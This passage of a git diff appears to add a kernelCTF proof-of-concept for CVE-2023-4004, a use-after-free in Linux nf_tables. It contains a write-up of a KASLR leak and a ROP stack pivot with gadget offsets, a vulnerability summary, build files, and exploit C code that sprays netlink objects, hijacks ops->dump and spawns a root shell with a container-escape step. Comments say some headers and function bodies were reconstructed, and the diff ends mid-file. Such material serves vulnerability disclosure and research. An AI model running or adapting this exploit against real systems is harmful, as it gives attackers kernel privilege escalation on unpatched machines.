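+When one of the dumped tables comes back with a kernel pointer where its userdata used to be, KASLR is broken. The control-flow hijack then happens when the corrupted object is fetched, because the dump path dereferences ops: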
+ ```
+ static int nft_object_dump(struct sk_buff *skb, unsigned int attr,
+			    struct nft_object *obj, bool reset){
+	struct nlattr *nest;
+
+	nest = nla_nest_start_noflag(skb, attr);
+	if (!nest)
+		goto nla_put_failure;
+	if (obj->ops->dump(skb, obj, reset) < 0) // after overwriting ops, we control RIP here
+		goto nla_put_failure;
+	nla_nest_end(skb, nest);
+	return 0;
+	...
+ ```
+### ROP detail
+Once we finish step 7 of `Control RIP`, we know the heap address of the target object's `NFTA_OBJ_USERDATA`, which we sprayed at step 6.
+I fill in the fake object data like this:
+```
+	// ops is the buffer that will be sent as NFTA_OBJ_USERDATA
+	// the field at offset 0x20 of ops is ops->dump
+	*(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff8198954b; // push rsi ; jmp qword ptr [rsi + 0x39]
+	...
+	// the field at offset 0x48 of leak_obj is obj->udata, which points to the NFTA_OBJ_USERDATA buffer
+	uint64_t rop_target_addr = *(uint64_t *)(&leak_obj[0x48]);
+	printf("rop : %lx\n", rop_target_addr);
+	// now fill in the fake object data
+	// stack migration, first hop
+	*(uint64_t *)(&leak_obj[0x39]) = kernel_off + 0xffffffff81027924; // pop rsp ; ret
+	// stack migration, second hop
+	*(uint64_t *)(&leak_obj[0]) = kernel_off + 0xffffffff81027924; // pop rsp ; ret
+	*(uint64_t *)(&leak_obj[8]) = rop_target_addr + 0x60; // the final ROP address
+	*(uint64_t *)(&leak_obj[0x80]) = rop_target_addr; // the field at offset 0x80 is the nft_object_ops pointer; point it at the NFTA_OBJ_USERDATA heap address
+	...
+```
+
+The resulting control flow looks like this:
+```
+
+  obj->ops->dump(skb, obj, reset) ->
+  push rsi ; jmp qword ptr [rsi + 0x39] ->  // RSI is the pointer to the object
+  pop rsp ; ret ->                          // stack migration: RSP now points into the object
+  pop rsp ; ret ->                          // stack migration again: RSP becomes rop_target_addr + 0x60 (NFTA_OBJ_USERDATA + 0x60)
+  now we can do normal ROP here
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/vulnerability.md
new file mode 100755
index 00000000..72108929
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/vulnerability.md
@@ -0,0 +1,29 @@
+# Vulnerability
+ In the function nft_pipapo_remove in net/netfilter/nft_set_pipapo.c, there is this line of code:
+
+
+	match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;
+
+
+ But it is possible to insert an element without an NFT_SET_EXT_KEY_END, so the nft_pipapo_elem can be freed while it is still reachable from the nft_set structure.
+
+## Requirements to trigger the vulnerability
+ - Capabilities: `CAP_NET_ADMIN` is required.
+ - Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`
+ - Are user namespaces needed?: Yes
+
+## Commit which introduced the vulnerability
+ - [commit 3c4287f62044a90e73a561aa05fc46e62da173da](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4287f62044a90e73a561aa05fc46e62da173da)
+
+## Commit which fixed the vulnerability
+- [commit 87b5a5c209405cb6b57424cdfa226a6dbd349232](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=87b5a5c209405cb6b57424cdfa226a6dbd349232)
+
+## Affected kernel versions
+- 5.6-rc1 and later, until the fix landed
+
+## Affected component, subsystem
+- net/netfilter (nf_tables)
+
+## Cause
+- UAF
+
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/Makefile b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/Makefile
new file mode 100644
index 00000000..e2a6e2ce
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/Makefile
@@ -0,0 +1,9 @@
+exploit:
+	gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static
+prerequisites:
+	sudo apt-get install libnl-nf-3-dev
+run:
+	./exploit
+
+clean:
+	rm exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/README b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/README
new file mode 100644
index 00000000..a47f88fd
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/README
@@ -0,0 +1,2 @@
+Exploit for kctf COS 105-17412.101.17
+Run the command "nsenter --target 1 -m -p" after running the PoC.
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/chain.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/chain.h
new file mode 100644
index 00000000..4245eb47
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/chain.h
@@ -0,0 +1,56 @@
+void new_chain(struct nl_sock * socket, char *table_name, char *chain_name){
+    struct nl_msg * msg = nlmsg_alloc();
+    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
+    struct nlmsghdr *hdr1 = nlmsg_put(
+        msg,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_BEGIN, // TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+    h->nfgen_family = 2;//NFPROTO_IPV4;
+    h->version = 0;
+    h->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+        msg2,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
+    h2->version = 0;
+    h2->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+    struct nl_msg * msg3 = nlmsg_alloc();
+    struct nlmsghdr *hdr3 = nlmsg_put(
+        msg3,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_END,// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name);
+    nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name);
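+    // nf_tables only applies NEWCHAIN (and other write commands) inside an
+    // NFNL_MSG_BATCH_BEGIN/NFNL_MSG_BATCH_END transaction, so the three
+    // messages are spliced into one buffer and sent with a single nl_sendto().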
+    uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+    char *buf = malloc(total_size);
+    memset(buf,0,total_size);
+    memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+    int res = nl_sendto(socket, buf, total_size);
+    nlmsg_free(msg);
+    if (res < 0) {
+        fprintf(stderr, "sending message failed\n");
+    } else {
+        printf("Create chain %s\n",chain_name);
+    }
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit
new file mode 100755
index 00000000..d02e2a8e
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
new file mode 100644
index 00000000..77e4cda9
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
@@ -0,0 +1,359 @@
+#define _GNU_SOURCE
+/* header names were garbled in this copy of the diff; reconstructed from what the code uses */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <sched.h>
+#include <arpa/inet.h>
+#include <netlink/netlink.h>
+#include <netlink/socket.h>
+#include <netlink/msg.h>
+#include <netlink/attr.h>
+#include <netlink/netfilter/nfnl.h>
+#include <linux/netlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+
+#include "obj.h"
+#include "setelem.h"
+#include "table.h"
+#include "set.h"
+#include "rule.h"
+#include "chain.h"
+#include "spec.h"
+#define THREAD_MAX_NUM 100
+#define SET_TABLE "set-table"
+#define OBJ_FOR_REF "obj-for-ref"
+#define OBJ_TABLE "obj-table"
+
+char *leak_obj=NULL;
+char *target_table=NULL;
+char *leak_data=NULL;
+int ct_expect_obj_num = 0;
+int table_num = 0;
+
+unsigned long user_cs,user_ss,user_rsp,user_rflags;
+uint64_t kernel_off, module_base, type_addr, prepare_kernel_cred, commit_creds;
+uint64_t set_num = 0;
+static void save_state() {
+    asm(
+    "movq %%cs, %0\n"
+    "movq %%ss, %1\n"
+    "movq %%rsp, %2\n"
+    "pushfq\n"
+    "popq %3\n"
+    : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory");
+}
+
+
+void shell(){
+    //printf("ret2usr success! uid : %d\n",getuid());
+
+    char *args[] = {"/bin/bash", "-i", NULL};
+    execve(args[0], args, NULL);
+}
+
+int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_TABLE_MAX+1];
+    memset(tb_msg,0,sizeof(tb_msg));
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //fprintf(stderr, "Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL);
+    char * table_name=NULL;
+    if (tb_msg[NFTA_TABLE_NAME]) {
+        table_name = nla_get_string(tb_msg[NFTA_TABLE_NAME]);
+        //printf("Get table: '%s'\n", table_name );
+    }
+    if (tb_msg[NFTA_TABLE_USERDATA]){
+        uint64_t * val = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+        nla_memcpy(val, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+        //printf("data[0] = %lx\n", val[0]);
+        if((val[0]&0xfffffffffffff000)!= 0x4c00000000000000 && val[0]!=0){
+            printf("Get table: '%s'\n", table_name );
+            printf("data[0] = %lx\n", val[0]);
+            leak_obj = (char *)val;
+            target_table = malloc(strlen(table_name)+1);
+            strcpy(target_table,table_name);
+            leak_data = (char *)val;
+        }
+    }
+    return NL_OK;
+}
+
+
+int nl_callback_for_obj(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_OBJ_MAX+1];
+    memset(tb_msg,0,sizeof(tb_msg));
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //fprintf(stderr, "Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_OBJ_MAX, attr, attrlen, NULL);
+    char * obj_name=NULL;
+    if (tb_msg[NFTA_OBJ_NAME]) {
+        obj_name = nla_get_string(tb_msg[NFTA_OBJ_NAME]);
+        printf("Get obj: '%s'\n", obj_name );
+    }
+    if (tb_msg[NFTA_OBJ_USERDATA]){
+        uint64_t * val = malloc(nla_len(tb_msg[NFTA_OBJ_USERDATA]));
+        nla_memcpy(val, tb_msg[NFTA_OBJ_USERDATA], nla_len(tb_msg[NFTA_OBJ_USERDATA]));
+        printf("data[0] = %lx\n", val[0]);
+        leak_data = (char *)val;
+    }
+    return NL_OK;
+}
+
+int setup_sandbox(void) {
+    if (unshare(CLONE_NEWUSER) < 0) {
+        perror("[-] unshare(CLONE_NEWUSER)");
+        return -1;
+    }
+    if (unshare(CLONE_NEWNET) < 0) {
+        perror("[-] unshare(CLONE_NEWNET)");
+        return -1;
+    }
+    return 0;
+}
+
+void spray_tables(struct nl_sock * socket, int len, char *udata, int size){
+    char *tmp = malloc(0x100);
+    memset(tmp,0,0x100);
+    int i;
+    for(i=0;i<len;i++){
+        sprintf(tmp,"table%d",table_num++); /* loop body reconstructed; the name pattern is assumed */
+        new_table_with_udata(socket,tmp,udata,size);
+    }
+}
+
+/* signature and preamble reconstructed; they follow the same batch pattern as new_obj_tunnel()/new_obj_quota() below */
+void new_obj_ct_expect(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){
+    struct nl_msg * msg = nlmsg_alloc();
+    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
+    struct nlmsghdr *hdr1 = nlmsg_put(
+        msg,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_BEGIN, // TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+    h->nfgen_family = 2;
+    h->version = 0;
+    h->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+        msg2,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
+    h2->version = 0;
+    h2->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+    struct nl_msg * msg3 = nlmsg_alloc();
+    struct nlmsghdr *hdr3 = nlmsg_put(
+        msg3,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_END,// TYPE
sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + char *a = malloc(0x100); + memset(a,0x41,0x100); + + nla_put_u8(data, NFTA_CT_EXPECT_L4PROTO, 0x41); + nla_put_u16(data, NFTA_CT_EXPECT_DPORT, 0x4141); + nla_put_u32(data, NFTA_CT_EXPECT_TIMEOUT, 0x41414141); + nla_put_u8(data, NFTA_CT_EXPECT_SIZE, 0x41); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_CT_EXPECT)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} +void new_obj_tunnel(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *ip = nlmsg_alloc(); + struct nl_msg *opts = nlmsg_alloc(); + struct nl_msg *opts_gen = nlmsg_alloc(); + //init ip + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_u32(ip, NFTA_TUNNEL_KEY_IP_DST, 0x41414141); + + nla_put_u16(opts_gen, NFTA_TUNNEL_KEY_GENEVE_CLASS, 0x10); + nla_put(opts_gen, NFTA_TUNNEL_KEY_GENEVE_DATA, 0x80, a); + nla_put_u8(opts_gen, NFTA_TUNNEL_KEY_GENEVE_TYPE, 0x10); + + nla_put_nested(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE|NLA_F_NESTED, opts_gen); + //struct nlattr *nla = nla_reserve(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE, nlmsg_datalen(opts_gen->nm_nlh)); + //nla->nla_type |= NLA_F_NESTED; + //memcpy(nla_data(nla), nlmsg_data(opts_gen->nm_nlh),nlmsg_datalen(opts_gen->nm_nlh)); + + nla_put_u32(data, NFTA_TUNNEL_KEY_ID, 0x41414141); + 
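+    // Nested tunnel-key attributes: the 0x80-byte GENEVE option blob makes
+    // this NFT_OBJECT_TUNNEL variant an alternative spray object with a
+    // different allocation size than ct_expect.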
nla_put_nested(data, NFTA_TUNNEL_KEY_IP, ip); + nla_put_nested(data, NFTA_TUNNEL_KEY_OPTS, opts); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_TUNNEL)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} + +void new_obj_quota(struct nl_sock * socket, char *table_name, char *obj_name,void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + //init ip + nla_put_u64(data, NFTA_QUOTA_BYTES, 0x100); + + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_QUOTA)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object quota %s\n",obj_name); + } +} + +void get_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + 
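+    // GETOBJ makes the kernel dump this object back through nft_object_dump(),
+    // which calls obj->ops->dump(); once ops has been overwritten, issuing this
+    // request is what hijacks control flow.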
//init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETOBJ, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_u32(msg, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg, NFTA_OBJ_NAME, obj_name); + nla_put_string(msg, NFTA_OBJ_TABLE, table_name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get obj %s\n",obj_name); + } +} + +void del_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/rule.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/rule.h new file mode 100644 index 00000000..d1fcd292 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/rule.h @@ -0,0 +1,71 @@ +void new_rule(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct 